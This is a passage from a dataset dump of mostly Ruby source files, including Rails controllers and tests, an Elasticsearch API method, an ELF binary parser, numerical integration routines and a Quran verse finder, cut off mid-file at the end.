hexsha (stringlengths, 40-40) | size (int64, 2-1.01M) | content (stringlengths, 2-1.01M) | avg_line_length (float64, 1.5-100) | max_line_length (int64, 2-1k) | alphanum_fraction (float64, 0.25-1) |
---|---|---|---|---|---|
0866f4f611953e25acbc2a049d7f449f0354ffa8 | 757 | require 'test_helper'
class MicropostTest < ActiveSupport::TestCase
def setup
@user = users(:michael)
# Building the micropost through the association ties it to its user.
@micropost = @user.microposts.build(content: "Lorem ipsum")
end
test "should be valid" do
assert @micropost.valid?
end
test "user id should be present" do
@micropost.user_id = nil
assert_not @micropost.valid?
end
test "content should be present" do
@micropost.content = " "
assert_not @micropost.valid?
end
test "content should be at most 140 characters" do
@micropost.content = "a" * 141
assert_not @micropost.valid?
end
test "order should be most recent first" do
assert_equal microposts(:most_recent), Micropost.first
end
end | 22.939394 | 63 | 0.689564 |
1c7abd9eff332bbaa3b77dfb6185e819f0830dae | 1,827 | # Licensed to Elasticsearch B.V. under one or more contributor
# license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright
# ownership. Elasticsearch B.V. licenses this file to you under
# the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
module Elasticsearch
module XPack
module API
module MachineLearning
module Actions
# Deletes a calendar.
#
# @option arguments [String] :calendar_id The ID of the calendar to delete
# @option arguments [Hash] :headers Custom HTTP headers
#
# @see https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-delete-calendar.html
#
def delete_calendar(arguments = {})
raise ArgumentError, "Required argument 'calendar_id' missing" unless arguments[:calendar_id]
headers = arguments.delete(:headers) || {}
arguments = arguments.clone
_calendar_id = arguments.delete(:calendar_id)
method = Elasticsearch::API::HTTP_DELETE
path = "_ml/calendars/#{Elasticsearch::API::Utils.__listify(_calendar_id)}"
params = {}
body = nil
perform_request(method, path, params, body, headers).body
end
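# Usage sketch (the client setup and calendar id are assumptions, not part
# of this file): with a configured Elasticsearch client that exposes the
# X-Pack machine learning namespace, the call could look like
#
#   client.xpack.ml.delete_calendar(calendar_id: 'planned-outages')
#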
end
end
end
end
end
| 35.823529 | 105 | 0.673235 |
e9cbf8a406d48edf1d73754596886176de957cad | 138 | if File.readable?("REVISION")
CurrentCommit = File.read("REVISION").strip
else
CurrentCommit = `git rev-parse --short HEAD`.chomp
end
| 23 | 52 | 0.731884 |
1c0b29fbcc66145387ea1b2398a9664b8b3a16ca | 543 | class ApplicationController < ActionController::Base
protect_from_forgery with: :exception
helper_method :current_user
def current_user
if session[:user_id]
@current_user ||= User.find(session[:user_id])
end
end
def authorize
if !current_user
flash[:alert] = "You aren't authorized to visit that page."
redirect_to '/'
end
end
def admin_only
# Guard against a nil current_user so non-logged-in visitors are redirected too.
unless current_user && current_user.admin
flash[:alert] = "You must be an admin to view or edit this page!"
redirect_to '/'
end
end
end | 21.72 | 71 | 0.67035 |
33bb6190e621ea96b2827123741ff11910d5b2e3 | 124 | require "test_helper"
class PreferenceTest < ActiveSupport::TestCase
# test "the truth" do
# assert true
# end
end
| 15.5 | 46 | 0.709677 |
e8ba3b255ab646602f40b9644c53603234e354d0 | 192 | class ApplicationMailer < ActionMailer::Base
# The gmail address specified here will be used to send emails to recipients.
default from: Rails.application.credentials.email[:username]
end
| 38.4 | 79 | 0.802083 |
1a6c3580c2deefd4f03ae4f5fffff50102d5c66d | 3,418 | # encoding: utf-8
require File.join(File.dirname(__FILE__), "../spec_helper.rb")
describe ActiveService::Model::Aggregations do
describe :composed_of do
context "with multiple value object" do
before do
spawn_model "User" do
attribute :address_street
attribute :address_city
composed_of :address, mapping: [ %w(address_street street), %w(address_city city) ]
end
class Address
attr_reader :street, :city
def initialize(attributes = {})
@street = attributes[:street]
@city = attributes[:city]
end
end
end
subject(:user) { User.new(:address_street => "123 Sesame St.", :address_city => "New York City") }
it "maps address attributes" do
expect(user.address.street).to eq "123 Sesame St."
expect(user.address.city).to eq "New York City"
end
it "maintains original attributes" do
expect(user.address_street).to eq "123 Sesame St."
expect(user.address_city).to eq "New York City"
end
it "handles respond_to for getter" do
expect { user.address }.not_to raise_error
expect(user.address).to be_kind_of(Address)
end
it "handles respond_to for setter" do
expect(user).to respond_to :address=
end
it "updates aggregation when attributes are updated" do
user.address_street = "New Street"
user.address_city = "New City"
expect(user.address.street).to eq "New Street"
expect(user.address.city).to eq "New City"
end
it "updates attributes when aggregation is updated" do
user.address = Address.new(:street => "New Street", :city => "New City")
expect(user.address_street).to eq "New Street"
expect(user.address_city).to eq "New City"
end
it "handles nil assignment" do
user.address = nil
expect(user.address).to_not be_nil
expect(user.address.street).to be_nil
expect(user.address.city).to be_nil
expect(user.address_street).to be_nil
expect(user.address_city).to be_nil
end
end
context "when class_name option is provided" do
before do
spawn_model "User" do
attribute :address_street
attribute :address_city
composed_of :work_address, class_name: 'Address', mapping: [ %w(address_street street), %w(address_city city) ]
end
class Address
attr_reader :street, :city
def initialize(attributes = {})
@street = attributes[:street]
@city = attributes[:city]
end
end
class BadAddress; end
end
subject(:user) { User.new(:address_street => "123 Sesame St.", :address_city => "New York City") }
it "maps to class having different class_name" do
expect(user.work_address.street).to eq "123 Sesame St."
expect(user.work_address.city).to eq "New York City"
expect(user.work_address).to be_kind_of(Address)
end
it "handles assignment of aggregation having different class_name" do
address = Address.new(:street => "New Street", :city => "New City")
expect { user.work_address = address }.not_to raise_error
expect { user.work_address = BadAddress.new }.to raise_error(NoMethodError)
end
end
end
end
| 33.509804 | 121 | 0.624927 |
01f0da120bfcfafc3ed81fcfe07e5c3d68fefea0 | 245 | #coding: utf-8
class ChangeVipDefaultAction < ActiveRecord::Migration
def up
sf = SystemFunction.find_by_subject_title('转账客户管理') # lookup title kept verbatim; roughly "transfer customer management"
if sf.present?
sf.default_action = 'vips_path()'
sf.save!
end
end
def down
end
end
| 17.5 | 55 | 0.681633 |
91058b99ca9052444e2ceb2435fcea0e43ca397a | 7,076 | # frozen_string_literal: true
class V4::VerseFinder < ::VerseFinder
def random_verse(filters, language_code, words: true, tafsirs: false, translations: false, audio: false)
@results = Verse.unscope(:order).where(filters).order('RANDOM()').limit(3)
load_translations(translations) if translations.present?
load_words(language_code) if words
load_audio(audio) if audio
load_tafsirs(tafsirs) if tafsirs.present?
words_ordering = words ? ', words.position ASC, word_translations.priority ASC' : ''
translations_order = translations.present? ? ',translations.priority ASC' : ''
@results.order("verses.verse_index ASC #{words_ordering} #{translations_order}".strip).sample
end
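# For illustration, when both words and translations are requested the
# ordering string built above interpolates to
# "verses.verse_index ASC , words.position ASC, word_translations.priority ASC ,translations.priority ASC",
# i.e. verses first, then word position, then translation priority.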
def find_with_key(key, language_code, words: true, tafsirs: false, translations: false, audio: false)
@results = Verse.where(verse_key: key).limit(1)
load_translations(translations) if translations.present?
load_words(language_code) if words
load_audio(audio) if audio
load_tafsirs(tafsirs) if tafsirs.present?
words_ordering = words ? ', words.position ASC, word_translations.priority ASC' : ''
translations_order = translations.present? ? ',translations.priority ASC' : ''
@results.order("verses.verse_index ASC #{words_ordering} #{translations_order}".strip).first
end
def load_verses(filter, language_code, words: true, tafsirs: false, translations: false, audio: false)
fetch_verses_range(filter)
load_translations(translations) if translations.present?
load_words(language_code) if words
load_audio(audio) if audio
load_tafsirs(tafsirs) if tafsirs.present?
words_ordering = words ? ', words.position ASC, word_translations.priority ASC' : ''
translations_order = translations.present? ? ',translations.priority ASC' : ''
@results.order("verses.verse_index ASC #{words_ordering} #{translations_order}".strip)
end
def fetch_verses_range(filter)
@results = send("fetch_#{filter}")
end
protected
def fetch_advance_copy
if params[:from] && params[:to]
verse_from = QuranUtils::Quran.get_ayah_id_from_key(params[:from])
verse_to = QuranUtils::Quran.get_ayah_id_from_key(params[:to])
@verses = Verse
.unscoped
.order('verses.verse_index asc')
.where('verses.verse_index >= :from AND verses.verse_index <= :to', from: verse_from, to: verse_to)
else
@verses = Verse.none
end
@verses
end
def fetch_filter
utils = QuranUtils::VerseRanges.new
ids = utils.get_ids_from_ranges(params[:filters])
results = Verse.unscoped.where(id: ids)
@total_records = results.size
@results = results.limit(per_page).offset((current_page - 1) * per_page)
if current_page < total_pages
@next_page = current_page + 1
end
@results
end
def fetch_by_chapter
chapter = find_chapter
@total_records = chapter.verses_count
verse_start = verse_pagination_start
verse_end = verse_pagination_end(verse_start, @total_records)
@next_page = current_page + 1 if verse_end < params[:to]
@results = Verse
.where(chapter_id: chapter.id)
.where('verses.verse_number >= ? AND verses.verse_number <= ?', verse_start.to_i, verse_end.to_i)
end
def fetch_by_page
mushaf_page = find_mushaf_page
# Disable pagination for by_page route
@per_page = @total_records = mushaf_page.verses_count
@next_page = nil
@results = rescope_verses('verse_index').where(page_number: mushaf_page.page_number)
end
def fetch_by_rub_el_hizb
rub_el_hizb = find_rub_el_hizb
# Disable pagination for by_page route
@per_page = @total_records = rub_el_hizb.verses_count
@next_page = nil
@results = rescope_verses('verse_index').where(rub_el_hizb_number: rub_el_hizb.rub_el_hizb_number)
end
def fetch_by_hizb
hizb = find_hizb
results = rescope_verses('verse_index')
.where(hizb_number: hizb.hizb_number)
@total_records = results.size
@results = results.limit(per_page).offset((current_page - 1) * per_page)
if current_page < total_pages
@next_page = current_page + 1
end
@results
end
def fetch_by_juz
juz = find_juz
verse_start = juz.first_verse_id + (current_page - 1) * per_page
verse_end = min(verse_start + per_page, juz.last_verse_id + 1)
if verse_end < juz.last_verse_id
@next_page = current_page + 1
end
@total_records = juz.verses_count
@results = rescope_verses('verse_index')
.where(juz_number: juz.juz_number)
.where('verses.verse_index >= ? AND verses.verse_index < ?', verse_start.to_i, verse_end.to_i)
end
def fetch_by_ruku
ruku = find_ruku
# Disable pagination for ruku route
@per_page = @total_records = ruku.verses_count
@next_page = nil
@results = rescope_verses('verse_index').where(ruku_number: ruku.ruku_number)
end
def fetch_by_manzil
manzil = find_manzil
verse_start = manzil.first_verse_id + (current_page - 1) * per_page
verse_end = min(verse_start + per_page, manzil.last_verse_id + 1)
if verse_end < manzil.last_verse_id
@next_page = current_page + 1
end
@total_records = manzil.verses_count
@results = rescope_verses('verse_index')
.where(manzil_number: manzil.manzil_number)
.where('verses.verse_index >= ? AND verses.verse_index < ?', verse_start.to_i, verse_end.to_i)
end
def verse_pagination_start
if (from = (params[:from] || 1).to_i.abs).zero?
from = 1
end
from + (current_page - 1) * per_page
end
def verse_pagination_end(start, total_verses)
to = params[:to].presence ? params[:to].to_i.abs : nil
verse_to = min(to || total_verses, total_verses)
params[:to] = verse_to
min((start + per_page - 1), verse_to)
end
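# Worked example (a per_page of 10 is assumed for illustration): for a
# chapter of 286 verses with no from/to params and current_page = 1,
# verse_pagination_start returns 1 and verse_pagination_end returns
# min(1 + 10 - 1, 286) = 10, so the first request serves verses 1-10.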
def load_words(word_translation_lang)
language = Language.find_with_id_or_iso_code(word_translation_lang)
words_with_default_translation = @results.where(word_translations: { language_id: Language.default.id })
if language
@results = @results
.where(word_translations: { language_id: language.id })
.or(words_with_default_translation)
.eager_load(words: eager_load_words)
else
@results = words_with_default_translation.eager_load(words: eager_load_words)
end
end
def load_translations(translations)
@results = @results
.where(translations: { resource_content_id: translations })
.eager_load(:translations)
end
def load_tafsirs(tafsirs)
@results = @results
.where(tafsirs: { resource_content_id: tafsirs })
.eager_load(:tafsirs)
end
def load_audio(recitation)
@results = @results
.where(audio_files: { recitation_id: recitation })
.eager_load(:audio_file)
end
def rescope_verses(by)
Verse.unscope(:order).order("#{by} ASC")
end
end
| 32.608295 | 117 | 0.687818 |
019b188015ff4e030c71f48a8fe755e046d3b378 | 908 | require_relative 'boot'
require "rails"
# Pick the frameworks you want:
require "active_model/railtie"
require "active_job/railtie"
require "active_record/railtie"
# require "active_storage/engine"
require "action_controller/railtie"
require "action_mailer/railtie"
require "action_view/railtie"
# require "action_cable/engine"
# require "sprockets/railtie"
require "rails/test_unit/railtie"
Bundler.require(*Rails.groups)
require "sinope"
module Dummy
class Application < Rails::Application
# Initialize configuration defaults for originally generated Rails version.
config.load_defaults 5.2
# Settings in config/environments/* take precedence over those specified here.
# Application configuration can go into files in config/initializers
# -- all .rb files in that directory are automatically loaded after loading
# the framework and any gems in your application.
end
end
| 29.290323 | 82 | 0.784141 |
3865ef644ce0ab22a475c4923a06b3ef906d5c9c | 4,055 | module ELFShim
# See: https://en.wikipedia.org/wiki/Executable_and_Linkable_Format#File_header
MAGIC_NUMBER_OFFSET = 0
MAGIC_NUMBER_ASCII = "\x7fELF".freeze
OS_ABI_OFFSET = 0x07
OS_ABI_SYSTEM_V = 0
OS_ABI_LINUX = 3
TYPE_OFFSET = 0x10
TYPE_EXECUTABLE = 2
TYPE_SHARED = 3
ARCHITECTURE_OFFSET = 0x12
ARCHITECTURE_I386 = 0x3
ARCHITECTURE_POWERPC = 0x14
ARCHITECTURE_ARM = 0x28
ARCHITECTURE_X86_64 = 0x3E # EM_X86_64 is 62 decimal (0x3E)
ARCHITECTURE_AARCH64 = 0xB7
def read_uint8(offset)
read(1, offset).unpack("C").first
end
def read_uint16(offset)
read(2, offset).unpack("v").first
end
def elf?
return @elf if defined? @elf
return @elf = false unless read(MAGIC_NUMBER_ASCII.size, MAGIC_NUMBER_OFFSET) == MAGIC_NUMBER_ASCII
# Check that this ELF file is for Linux or System V.
# OS_ABI is often set to 0 (System V), regardless of the target platform.
@elf = [OS_ABI_LINUX, OS_ABI_SYSTEM_V].include? read_uint8(OS_ABI_OFFSET)
end
def arch
return :dunno unless elf?
@arch ||= case read_uint16(ARCHITECTURE_OFFSET)
when ARCHITECTURE_I386 then :i386
when ARCHITECTURE_X86_64 then :x86_64
when ARCHITECTURE_POWERPC then :powerpc
when ARCHITECTURE_ARM then :arm
when ARCHITECTURE_AARCH64 then :arm64
else :dunno
end
end
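# Illustration using values from the ELF specification (not a specific
# file): for a 64-bit x86_64 binary the two bytes at offset 0x12 are
# 0x3E 0x00, so read_uint16(ARCHITECTURE_OFFSET) yields 0x3E and arch
# returns :x86_64.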
def elf_type
return :dunno unless elf?
@elf_type ||= case read_uint16(TYPE_OFFSET)
when TYPE_EXECUTABLE then :executable
when TYPE_SHARED then :dylib
else :dunno
end
end
def dylib?
elf_type == :dylib
end
def binary_executable?
elf_type == :executable
end
def dynamic_elf?
return @dynamic_elf if defined? @dynamic_elf
if which "readelf"
Utils.popen_read("readelf", "-l", to_path).include?(" DYNAMIC ")
elsif which "file"
!Utils.popen_read("file", "-L", "-b", to_path)[/dynamic|shared/].nil?
else
raise "Please install either readelf (from binutils) or file."
end
end
class Metadata
attr_reader :path, :dylib_id, :dylibs
def initialize(path)
@path = path
@dylibs = []
@dylib_id, needed = needed_libraries path
return if needed.empty?
ldd = DevelopmentTools.locate "ldd"
ldd_output = Utils.popen_read(ldd, path.expand_path.to_s).split("\n")
return unless $CHILD_STATUS.success?
ldd_paths = ldd_output.map do |line|
match = line.match(/\t.+ => (.+) \(.+\)|\t(.+) => not found/)
next unless match
match.captures.compact.first
end.compact
@dylibs = ldd_paths.select do |ldd_path|
next true unless ldd_path.start_with? "/"
needed.include? File.basename(ldd_path)
end
end
private
def needed_libraries(path)
if DevelopmentTools.locate "readelf"
needed_libraries_using_readelf path
elsif DevelopmentTools.locate "patchelf"
needed_libraries_using_patchelf path
else
raise "patchelf must be installed: brew install patchelf"
end
end
def needed_libraries_using_patchelf(path)
patchelf = DevelopmentTools.locate "patchelf"
if path.dylib?
command = [patchelf, "--print-soname", path.expand_path.to_s]
soname = Utils.safe_popen_read(*command).chomp
end
command = [patchelf, "--print-needed", path.expand_path.to_s]
needed = Utils.safe_popen_read(*command).split("\n")
[soname, needed]
end
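# Sketch of the output being parsed (library names are illustrative):
# `patchelf --print-soname` prints a single soname such as "libfoo.so.1",
# and `patchelf --print-needed` prints one dependency per line, e.g.
# "libc.so.6", which split("\n") turns into the `needed` array.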
def needed_libraries_using_readelf(path)
soname = nil
needed = []
command = ["readelf", "-d", path.expand_path.to_s]
lines = Utils.safe_popen_read(*command).split("\n")
lines.each do |s|
filename = s[/\[(.*)\]/, 1]
next if filename.nil?
if s.include? "(SONAME)"
soname = filename
elsif s.include? "(NEEDED)"
needed << filename
end
end
[soname, needed]
end
end
def metadata
@metadata ||= Metadata.new(self)
end
def dylib_id
metadata.dylib_id
end
def dynamically_linked_libraries(*)
metadata.dylibs
end
end
| 25.664557 | 103 | 0.660912 |
6a1ff979c3f567acd4a6f83c0bc2cb7c4ad21548 | 954 | require "test_helper"
class DesktopTest < Minitest::Test
def setup
@app_roots = [
ONDEMAND.join("apps", "bc_desktop"),
AWESIM.join("apps", "bc_desktop"),
]
end
def test_that_it_is_same_across_portals
app_files = @app_roots.map do |p|
Dir.glob(p.join("**", "*")).map{|f| Pathname.new(f)}.select(&:file?).sort
end
# Check for missing files
rel_files = @app_roots.zip(app_files).map do |dir, files|
files.map {|f| f.relative_path_from(dir)}
end
missing = (rel_files.reduce(:+) - rel_files.reduce(:&)).uniq.map do |p|
@app_roots.map { |dir| dir.join(p) }.reject(&:file?)
end.flatten
assert missing.empty?, "Missing Desktop App files:\n #{missing.join("\n ")}"
# Compare files
app_files.combination(2) do |a_files, b_files|
a_files.zip(b_files) do |a, b|
assert FileUtils.cmp(a, b), "Desktop App files differ:\n #{a}\n #{b}"
end
end
end
end
| 28.909091 | 82 | 0.618449 |
e275a67ffe1fcccd335d331bb22cb0d8d231007b | 1,350 | class EventsController < ApplicationController
def new
init
@event = Event.new
@event.ticket_types.build
end
def index
@events = if params[:search]
Event.search(params[:search]).where("starts_at > ?", DateTime.now).where(published: true)
else
Event.where("starts_at > ?", DateTime.now).where(published: true)
end
end
def create
init
@event = Event.create event_params
@event.creater_id = current_user.id
@event.venue_id = params[:venue_id]
@event.category_id = params[:category_id]
if @event.starts_at < @event.ends_at
if @event.save
flash[:success] = "Event is made"
redirect_to root_path
else
flash.now[:error] = "Error: #{@event.errors.full_messages.to_sentence}"
redirect_to new_event_path
end
else
flash.now[:error] = "Event can't start after it end"
redirect_to new_event_path
end
end
def updateStatus
@event = Event.find(params[:event_id])
@event.toggle!(:published)
@event.save
redirect_to user_path(current_user.id)
end
def show
@event = Event.find(params[:id])
end
private
def event_params
params.require(:event).permit(:name, :starts_at, :ends_at, :hero_image_url, :extended_html_description, :venue_id, :category_id, ticket_types_attributes: [:name, :price, :max_quantity])
end
def init
@venues = Venue.all
@categories = Category.all
end
end
| 24.545455 | 197 | 0.717037 |
2634f30c942c3db65e6be5483c327faec51cc932 | 4,577 | # Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::RecoveryServicesSiteRecovery::Mgmt::V2018_01_10
module Models
#
# HyperV replica 2012 R2 (Blue) replication details.
#
class HyperVReplicaBlueReplicationDetails < ReplicationProviderSpecificSettings
include MsRestAzure
def initialize
@instanceType = "HyperVReplica2012R2"
end
attr_accessor :instanceType
# @return [DateTime] The Last replication time.
attr_accessor :last_replicated_time
# @return [Array<VMNicDetails>] The PE Network details.
attr_accessor :vm_nics
# @return [String] The virtual machine Id.
attr_accessor :vm_id
# @return [String] The protection state for the vm.
attr_accessor :vm_protection_state
# @return [String] The protection state description for the vm.
attr_accessor :vm_protection_state_description
# @return [InitialReplicationDetails] Initial replication details.
attr_accessor :initial_replication_details
# @return [Array<DiskDetails>] VM disk details.
attr_accessor :v_mdisk_details
#
# Mapper for HyperVReplicaBlueReplicationDetails class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'HyperVReplica2012R2',
type: {
name: 'Composite',
class_name: 'HyperVReplicaBlueReplicationDetails',
model_properties: {
instanceType: {
client_side_validation: true,
required: true,
serialized_name: 'instanceType',
type: {
name: 'String'
}
},
last_replicated_time: {
client_side_validation: true,
required: false,
serialized_name: 'lastReplicatedTime',
type: {
name: 'DateTime'
}
},
vm_nics: {
client_side_validation: true,
required: false,
serialized_name: 'vmNics',
type: {
name: 'Sequence',
element: {
client_side_validation: true,
required: false,
serialized_name: 'VMNicDetailsElementType',
type: {
name: 'Composite',
class_name: 'VMNicDetails'
}
}
}
},
vm_id: {
client_side_validation: true,
required: false,
serialized_name: 'vmId',
type: {
name: 'String'
}
},
vm_protection_state: {
client_side_validation: true,
required: false,
serialized_name: 'vmProtectionState',
type: {
name: 'String'
}
},
vm_protection_state_description: {
client_side_validation: true,
required: false,
serialized_name: 'vmProtectionStateDescription',
type: {
name: 'String'
}
},
initial_replication_details: {
client_side_validation: true,
required: false,
serialized_name: 'initialReplicationDetails',
type: {
name: 'Composite',
class_name: 'InitialReplicationDetails'
}
},
v_mdisk_details: {
client_side_validation: true,
required: false,
serialized_name: 'vMDiskDetails',
type: {
name: 'Sequence',
element: {
client_side_validation: true,
required: false,
serialized_name: 'DiskDetailsElementType',
type: {
name: 'Composite',
class_name: 'DiskDetails'
}
}
}
}
}
}
}
end
end
end
end
| 31.349315 | 83 | 0.493118 |
acadac733c8229e6059090ae672b4af05a77dff6 | 209 | require 'twitch'
::TWITCH = Twitch.new({
client_id: ENV['TWITCH_CLIENT_ID'],
secret_key: ENV['TWITCH_CLIENT_SECRET'],
redirect_uri: 'http://japanesekoreanug.com',
scope: ['user_read']
})
TWITCH.link
| 19 | 46 | 0.708134 |
629c3c6560daec0cb76af4f7e1edad78549ec5a4 | 915 | Profiles::Application.routes.draw do
root 'users#me'
match '/search', to: 'users#search', via: 'post'
match '/groups', to: 'users#list_groups', via: 'get'
match '/users', to: 'users#list_users', via: 'get'
match '/years', to: 'users#list_years', via: 'get'
match '/user/:uid', to: 'users#user', via: 'get', constraints: { :uid => /[\w+\.]+/ }
match '/me', to: 'users#me', via: 'get'
match '/image/:uid', to: 'users#image', via: 'get', constraints: { :uid => /[\w+\.]+/ }
match '/autocomplete', to: 'users#autocomplete', via: 'get'
match '/update', to: 'users#update', via: 'post'
match '/profiles', to: 'users#user', via: 'get'
match '/group/:group', to: 'users#group', via: 'get'
match '/year/:year', to: 'users#year', via: 'get'
match '/autocomplete', to: 'users#autocomplete', via: 'get'
match '/clearcache', to: 'users#clear_cache', via: 'get'
end
| 50.833333 | 92 | 0.585792 |
f804345bbbdeba493f0df8360878a660894d64b1 | 4,108 | module Silicium
class IntegralDoesntExistError < RuntimeError
end
##
# A class providing numerical integration methods
class NumericalIntegration
# Computes integral from +a+ to +b+ of +block+ with accuracy +eps+
def self.three_eights_integration(a, b, eps = 0.0001, &block)
wrapper_method([a, b], eps, 'three_eights_integration_n', &block)
end
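# Usage sketch (standard library only; the integrand is illustrative):
# the integral of sin(x) over [0, Math::PI] is exactly 2, and
#
#   Silicium::NumericalIntegration.three_eights_integration(0, Math::PI) { |x| Math.sin(x) }
#
# converges to ~2.0 within the default 0.0001 tolerance.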
# Computes integral from +a+ to +b+ of +block+ with +n+ segmentations
def self.three_eights_integration_n(a, b, n, &block)
dx = (b - a) / n.to_f
result = 0
x = a
n.times do
result +=
(block.call(x) + 3 * block.call((2 * x + x + dx) / 3.0) +
3 * block.call((x + 2 * (x + dx)) / 3.0) + block.call(x + dx)) / 8.0 * dx
x += dx
end
result
end
# Simpson integration with a segment
def self.simpson_integration_with_a_segment(a, b, n, &block)
dx = (b - a) / n.to_f
result = 0
i = 0
while i < n
result += (block.call(a + i * dx) + 4 * block.call(((a + i * dx) +
(a + (i + 1) * dx)) / 2.0) + block.call(a + (i + 1) * dx)) / 6.0 * dx
i += 1
end
result
end
# Simpson integration with specified accuracy
def self.simpson_integration(a, b, eps = 0.0001, &block)
wrapper_method([a, b], eps, 'simpson_integration_with_a_segment', &block)
end
# Left Rectangle Method and Right Rectangle Method
def self.left_rect_integration(left_p, right_p, eps = 0.0001, &block)
splits = 1
res1 = left_rect_integration_n(left_p, right_p, 1, &block)
res2 = left_rect_integration_n(left_p, right_p, 5, &block)
while (res1 - res2).abs > eps
res1 = left_rect_integration_n(left_p, right_p, splits, &block)
splits *= 5
res2 = left_rect_integration_n(left_p, right_p, splits, &block)
end
(res1 + res2) / 2.0
end
# Left Rectangle Auxiliary Method and Right Rectangle Auxiliary Method
def self.left_rect_integration_n(left_p, right_p, splits, &block)
dx = (right_p - left_p) / splits.to_f
result = 0
i = 0
while i < splits
result += block.call(left_p + i * dx)
i += 1
end
result * dx
end
# Middle Rectangles Method with a segment
def self.middle_rectangles_with_a_segment(a, b, n, &block)
dx = (b - a) / n.to_f
result = 0
i = 0
n.times do
result += block.call(a + dx * (i + 0.5)) * dx # 0.5, not integer 1 / 2, so the sample point is the true midpoint
i += 1
end
result
end
# Middle Rectangles Method with specified accuracy
def self.middle_rectangles(a, b, eps = 0.0001, &block)
wrapper_method([a, b], eps, 'middle_rectangles_with_a_segment', &block)
end
# Trapezoid Method with a segment
def self.trapezoid_with_a_segment(a, b, n, &block)
dx = (b - a) / n.to_f
result = 0
i = 1
(n - 1).times do
result += block.call(a + dx * i)
i += 1
end
result += (block.call(a) + block.call(b)) / 2.0
result * dx
end
# Trapezoid Method with specified accuracy
def self.trapezoid(a, b, eps = 0.0001, &block)
wrapper_method([a, b], eps, 'trapezoid_with_a_segment', &block)
end
private
# Wrapper method for num_integratons methods
def self.wrapper_method(a_b, eps, func, &block)
n = 1
begin
begin
# Dispatch by method name with send instead of eval-ing an interpolated string.
result = send(func, a_b[0], a_b[1], n, &block)
n *= 5
result1 = send(func, a_b[0], a_b[1], n, &block)
if result.nan? || result1.nan?
raise IntegralDoesntExistError, 'We have not-a-number result :('
end
if result == Float::INFINITY || result1 == Float::INFINITY
raise IntegralDoesntExistError, 'We have infinity :('
end
end until (result - result1).abs < eps
rescue Math::DomainError
raise IntegralDoesntExistError, 'Domain error in math function'
rescue ZeroDivisionError
raise IntegralDoesntExistError, 'Divide by zero'
end
(result + result1) / 2.0
end
end
end
| 29.985401 | 87 | 0.581548 |
8785014ef73aa69198dd681c902d6662027ae5af | 2,075 | control 'packages' do
impact 1.0
title 'confirm package installation'
desc 'confirm all desired packages are installed'
describe command('apk info') do
its('stdout') { should include ('curl') }
its('stdout') { should include ('python3') }
its('stdout') { should include ('build-base') }
its('stdout') { should include ('python3-dev') }
its('stdout') { should include ('libffi-dev') }
its('stdout') { should include ('libressl-dev') }
end
end
control 'python3 version' do
impact 1.0
title 'confirm python3 version installed'
desc 'confirm version reported by python3 matches the desired version'
describe command('python3 -V') do
its('stdout') { should include ('3.7') }
end
end
control 'pip version' do
impact 1.0
title 'confirm pip version installed'
desc 'confirm version reported by pip3 matches the desired version'
describe command('pip -V') do
its('stdout') { should include ('19.2') }
end
end
control 'python packages' do
impact 1.0
title 'confirm python package installation'
desc 'confirm all desired python packages are installed'
describe command('pip list') do
its('stdout') { should include ('setuptools') }
its('stdout') { should include ('wheel') }
its('stdout') { should include ('twine') }
end
end
control 'wheel version' do
impact 1.0
title 'confirm wheel version installed'
desc 'confirm version reported by wheel matches the desired version'
describe command('wheel version') do
its('stdout') { should include ('0.33') }
end
end
control 'twine version' do
impact 1.0
title 'confirm twine version installed'
desc 'confirm version reported by twine matches the desired version'
describe command('twine --version') do
its('stdout') { should include ('1.14') }
end
end
control 'cc-test-reporter installed' do
impact 1.0
title 'confirm cc-test-reporter installed'
desc 'confirm cc-test-reporter installed'
describe command('cc-test-reporter --version') do
its('stdout') { should include ('Code Climate Test Reporter') }
end
end
| 29.642857 | 72 | 0.69494 |
bb9c8f802e321ca6fd5bc126cc2a1f95acef1c60 | 686 | # Copyright 2016 LINE
#
# LINE Corporation licenses this file to you under the Apache License,
# version 2.0 (the "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
module Line
module Bot
module API
VERSION = "1.2.2"
end
end
end
| 31.181818 | 77 | 0.740525 |
e8970fc59fa68c05c7e285490f814e81ce4cbb05 | 527 | #!/usr/bin/ruby
free = `sar -d 1 5|grep Average`.split("\n")
descriptions = free[0].split(/\s+|\|/).collect{|x| x.strip.sub("/s","")}
descriptions.shift(2)
free.shift
interfaces = Hash.new
free.each do |interface|
interface = interface.strip.split(/\s+/).collect(&:strip)
interface.shift
ifname = interface.shift
interfaces[ifname] = interface.collect(&:to_f).zip(descriptions)
end
interfaces.each do |key, value|
value.each do |value, description|
puts "#{key}.#{description.sub('%','')} #{value}"
end
end
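# Example of the emitted lines (device names and figures are illustrative;
# sar may report devices as dev8-0 or sda depending on flags):
#   dev8-0.tps 3.2
#   dev8-0.rd_sec 140.8
# i.e. one "<device>.<column> <value>" line per parsed sar column.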
| 26.35 | 73 | 0.669829 |
d5959479b13b2f9fe39832b3a046964ba6d37921 | 1,109 | # typed: true
# frozen_string_literal: true
module EntityMapper
module ActiveRecord
class Context
def initialize(transaction_class: ::ActiveRecord::Base)
@tracked_aggregates = []
@transaction_class = transaction_class
end
def call
@transaction_class.transaction do
yield(self).tap do
save_changes
end
end
end
def read(mapping, active_record_object, options = {})
mapped_entity, ar_map = ActiveRecord::Read.call(mapping, active_record_object, options)
@tracked_aggregates << TrackedAggregate.new(
mapped_entity, ar_map, active_record_object, mapping
)
mapped_entity
end
def create(mapping, entity, active_record_class)
active_record_object = active_record_class.new
@tracked_aggregates << TrackedAggregate.new(
entity, ArMap.new, active_record_object, mapping
)
active_record_object
end
private
def save_changes
@tracked_aggregates.each(&:save_changes)
